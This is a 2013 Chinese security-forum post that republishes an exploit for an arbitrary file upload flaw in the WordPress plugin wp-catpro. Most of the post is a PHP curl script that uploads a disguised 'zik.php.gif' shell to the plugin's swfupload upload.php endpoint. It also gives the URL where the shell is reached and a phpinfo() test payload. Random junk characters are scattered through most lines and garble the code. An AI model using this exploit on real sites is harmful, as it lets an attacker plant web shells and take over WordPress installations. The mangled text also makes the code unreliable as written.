找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2178|回复: 0
打印 上一主题 下一主题

WordPress插件wp-catpro任意文件上传

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-27 20:12:43 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability; L1 b2 }  f0 e; I! {! e
#-----------------------------------------------------------------------, ?& f- }: Z) v9 y$ ^$ a

: J$ s1 ?, z9 {; t作者  => Zikou-16: h8 @7 r) `) y$ V
邮箱 => zikou16x@gmail.com! d) X6 @) V( {
测试系统 : Windows 7 , Backtrack 5r3
# p6 t: s7 R3 ^' t3 C; ]  F下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip8 [( Z4 x; R4 h5 a  ]1 ^
####2 p& m. ]9 f8 j' [/ Z
6 Q, n$ L" _& [! m* }
#=> Exploit 信息:, z3 B: {8 d3 \% G
------------------
2 X/ N6 h1 ?+ N9 m. U- p# 攻击者可以上传 file/shell.php.gif; K1 `' ]# R& I
# ("jpg", "gif", "png")  // Allowed file extensions* m( W! }2 R4 V; ?9 a2 K
# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
3 j+ M  Q9 P) v  _2 o' Y# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
  J" S- Y6 ~' B2 ]------------------
$ l+ f! r3 c$ o$ p. D8 A
9 r$ G; x% ?* Z! ]" k3 M1 l- i" [#=> Exploit
% m! u. @5 b( u3 M-----------
! o0 h3 n/ {) H/ H<?php
# z: @7 Z+ _. }3 S/ H! @ $ A' c3 F) ^$ }3 r1 c. _6 Y" `4 Z
$uploadfile="zik.php.gif";
: d, d0 E9 t1 _7 R- q' L6 L+ ~$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
2 i2 f, M/ q7 c7 ocurl_setopt($ch, CURLOPT_POST, true);
. U9 [) T# z/ k& l% }& W6 @$ Kcurl_setopt($ch, CURLOPT_POSTFIELDS,
* m! J6 j+ J3 X* \- K- h2 e6 [( [array('Filedata'=>"@$uploadfile",1 n) e2 Q" D4 N3 j3 W% b
'folder'=>'/wp-content/uploads/catpro/'));
8 d9 D5 Q3 U6 L: `0 c% pcurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
) K4 j/ B4 B" k: M2 p7 V, J4 O$postResult = curl_exec($ch);6 o9 X3 l5 U# b
curl_close($ch);' ^; o# s0 }  o

( w1 F8 B0 c/ t: B+ l# gprint "$postResult";/ \# B# S, F/ _1 k* l0 c; W( A
3 h  h2 P! _: f6 C2 u2 w/ m
Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif9 I2 W  n9 ?1 g, c! \0 M3 y7 a
  ?>
/ t( [* ?3 n9 W$ i<?php
6 x8 }$ o  d; h: i# Bphpinfo();+ l+ W: H5 o- u5 G' Z
?>
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表